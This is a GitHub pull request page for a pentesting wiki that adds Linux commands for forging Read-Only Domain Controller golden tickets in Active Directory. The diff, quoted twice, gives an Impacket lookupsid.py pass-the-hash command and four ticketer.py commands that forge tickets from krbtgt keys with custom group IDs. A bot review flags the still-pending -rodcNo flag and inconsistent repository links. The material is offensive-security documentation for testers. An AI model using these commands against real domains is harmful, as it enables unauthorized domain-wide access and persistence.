Add UNIX-like commands for RODC golden ticket by Crqfty · Pull Request #264 · The-Hacker-Recipes/The-Hacker-Recipes

Crqfty · 2026-04-14T22:47:20Z

Hi,
https://github.com/Greylorn did a pull request to impacket, adding new flag "-rodcNo" to ticketer.py, making RODC golden ticket doable from linux.
fortra/impacket#2169

qodo-code-review · 2026-04-14T22:47:31Z

Review Summary by Qodo

Add UNIX-like RODC golden ticket creation documentation

📝 Documentation ✨ Enhancement

Walkthroughs

Description

• Add UNIX-like commands for RODC golden ticket creation
• Document Impacket scripts for domain SID retrieval
• Provide examples with RC4 and AES key variants
• Include custom user/groups IDs configuration example

Diagram

flowchart LR
  A["RODC Golden Ticket<br/>Documentation"] --> B["Find Domain SID<br/>lookupsid.py"]
  A --> C["Create Ticket<br/>ticketer.py"]
  C --> D["RC4 Key<br/>-nthash"]
  C --> E["AES Key<br/>-aesKey"]
  C --> F["Custom IDs<br/>-user-id -groups"]

File Changes

1. docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md 📝 Documentation +18/-1

Document RODC golden ticket creation on UNIX-like systems

• Replaced placeholder text with comprehensive UNIX-like implementation guide
• Added note about pending Impacket pull request #2169
• Documented lookupsid.py command for domain SID retrieval
• Provided four ticketer.py command examples covering RC4, AES, and custom ID scenarios

docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md

qodo-code-review · 2026-04-14T22:47:32Z

Code Review by Qodo

🐞 Bugs (1) 📘 Rule violations (1) 📎 Requirement gaps (0)

🐞\ ⚙ Maintainability (1)

📘\ ≡ Correctness (1)

1. -rodcNo used while pending 📘 ≡

Description

The UNIX-like CLI examples use the ticketer.py -rodcNo flag while the surrounding note states the
upstream PR adding -rodcNo is still pending, making these commands likely non-functional when
copy/pasted. This violates the requirement that example commands use valid syntax/flags aligned with
the described intent.

Code

docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[R21-37]

+> [!NOTE]
+> _At the time of writing, 15th Apr. 2026,_ [_the pull request_](https://github.com/fortra/impacket/pull/2169) _adding the `-rodcNo` is pending._
+
+There are [Impacket](https://github.com/fortra/impacket) scripts for each step of a golden ticket creation : retrieving the domain SID, creating the RODC golden ticket.
+
+```bash
+# Find the domain SID
+lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
+
+# Create the RODC golden ticket (with an RC4 key, i.e. NT hash)
+ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" "randomuser"
+
+# Create the RODC golden ticket (with an AES 128/256bits key)
+ticketer.py -aesKey "$krbtgtAESkey" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" "randomuser"
+
+# Create the RODC golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids
+ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" -user-id "$USERID" -groups "$GROUPID1,$GROUPID2,..." "randomuser"

Evidence
The note explicitly says the PR adding -rodcNo is pending, but the newly added example commands
immediately rely on -rodcNo, which is therefore not a valid/copy-paste-friendly flag for the
currently released tool as described.
docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[21-37]
Best Practice: Learned patterns

Agent prompt

The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
The doc states the upstream Impacket PR adding `-rodcNo` is pending, but the example commands require `-rodcNo`, so copy/paste usage will likely fail.

## Issue Context
This page is reader-facing documentation and the compliance checklist requires example commands to match described intent and use valid syntax/flags.

## Fix Focus Areas
- docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[21-37]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

2. Inconsistent Impacket repo links 🐞 ⚙

Description

This page links to github.com/fortra/impacket while the rest of the documentation consistently
links to github.com/SecureAuthCorp/impacket, which is confusing and makes it unclear which
upstream repository readers should follow. The inconsistent linking increases the risk that users
follow different upstreams when looking for the referenced scripts/flags.

Code

docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[24]
+There are [Impacket](https://github.com/fortra/impacket) scripts for each step of a golden ticket creation : retrieving the domain SID, creating the RODC golden ticket.

Evidence
The modified page introduces a fortra/impacket link, whereas other forged-ticket docs (and many
other pages) still reference SecureAuthCorp/impacket, so this PR introduces inconsistency rather
than following the repo’s existing convention.
docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[24-24]
docs/src/ad/movement/kerberos/forged-tickets/golden.md[26-26]
docs/src/ad/movement/kerberos/forged-tickets/silver.md[25-25]

Agent prompt

The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
This page links to a different Impacket upstream (`fortra/impacket`) than the rest of the documentation (`SecureAuthCorp/impacket`). This inconsistency makes it unclear which repo is canonical for readers.

## Issue Context
If the project intends to migrate to `fortra/impacket`, it should be updated consistently across the documentation set; otherwise this page should match the existing convention.

## Fix Focus Areas
- docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[24-24]
- docs/src/ad/movement/kerberos/forged-tickets/golden.md[26-26]
- docs/src/ad/movement/kerberos/forged-tickets/silver.md[25-25]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

ⓘ The new review experience is currently in Beta. Learn more

qodo-code-review · 2026-04-14T22:50:00Z

+> [!NOTE]
+> _At the time of writing, 15th Apr. 2026,_ [_the pull request_](https://github.com/fortra/impacket/pull/2169) _adding the `-rodcNo` is pending._
+
+There are [Impacket](https://github.com/fortra/impacket) scripts for each step of a golden ticket creation : retrieving the domain SID, creating the RODC golden ticket.
+
+```bash
+# Find the domain SID
+lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
+
+# Create the RODC golden ticket (with an RC4 key, i.e. NT hash)
+ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" "randomuser"
+
+# Create the RODC golden ticket (with an AES 128/256bits key)
+ticketer.py -aesKey "$krbtgtAESkey" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" "randomuser"
+
+# Create the RODC golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids
+ticketer.py -nthash "$krbtgtNThash" -domain-sid "$domainSID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" -user-id "$USERID" -groups "$GROUPID1,$GROUPID2,..." "randomuser"


1. -rodcno used while pending 📘 Rule violation ≡ Correctness

The UNIX-like CLI examples use the ticketer.py -rodcNo flag while the surrounding note states the upstream PR adding -rodcNo is still pending, making these commands likely non-functional when copy/pasted. This violates the requirement that example commands use valid syntax/flags aligned with the described intent.

Agent Prompt

## Issue description The doc states the upstream Impacket PR adding `-rodcNo` is pending, but the example commands require `-rodcNo`, so copy/paste usage will likely fail. ## Issue Context This page is reader-facing documentation and the compliance checklist requires example commands to match described intent and use valid syntax/flags. ## Fix Focus Areas - docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md[21-37]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

ShutdownRepo · 2026-05-25T15:29:36Z

thank you for this contribution
If you'd like your name to be highlighted in this page's authors section, please make another PR with an update to the top of the page 🙂

qodo-code-review Bot reviewed Apr 14, 2026

View reviewed changes

Crafty added 2 commits April 15, 2026 08:43

Add UNIX-like commands for RODC golden ticket

7e59ae2

RODC golden ticket text note edit

8b46ecc

ShutdownRepo approved these changes May 25, 2026

View reviewed changes

ShutdownRepo merged commit 72255b7 into The-Hacker-Recipes:main May 25, 2026

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Add UNIX-like commands for RODC golden ticket#264

Add UNIX-like commands for RODC golden ticket#264
ShutdownRepo merged 2 commits into
The-Hacker-Recipes:mainfrom
Crqfty:main

Crqfty commented Apr 14, 2026

Uh oh!

qodo-code-review Bot commented Apr 14, 2026

Uh oh!

qodo-code-review Bot commented Apr 14, 2026 •

edited

Loading

Uh oh!

qodo-code-review Bot Apr 14, 2026

Uh oh!

ShutdownRepo commented May 25, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Uh oh!

Conversation

Crqfty commented Apr 14, 2026

Uh oh!

qodo-code-review Bot commented Apr 14, 2026

Review Summary by Qodo

Walkthroughs

File Changes

Uh oh!

qodo-code-review Bot commented Apr 14, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Code Review by Qodo

Uh oh!

qodo-code-review Bot Apr 14, 2026

Choose a reason for hiding this comment

Uh oh!

ShutdownRepo commented May 25, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

qodo-code-review Bot commented Apr 14, 2026 •

edited

Loading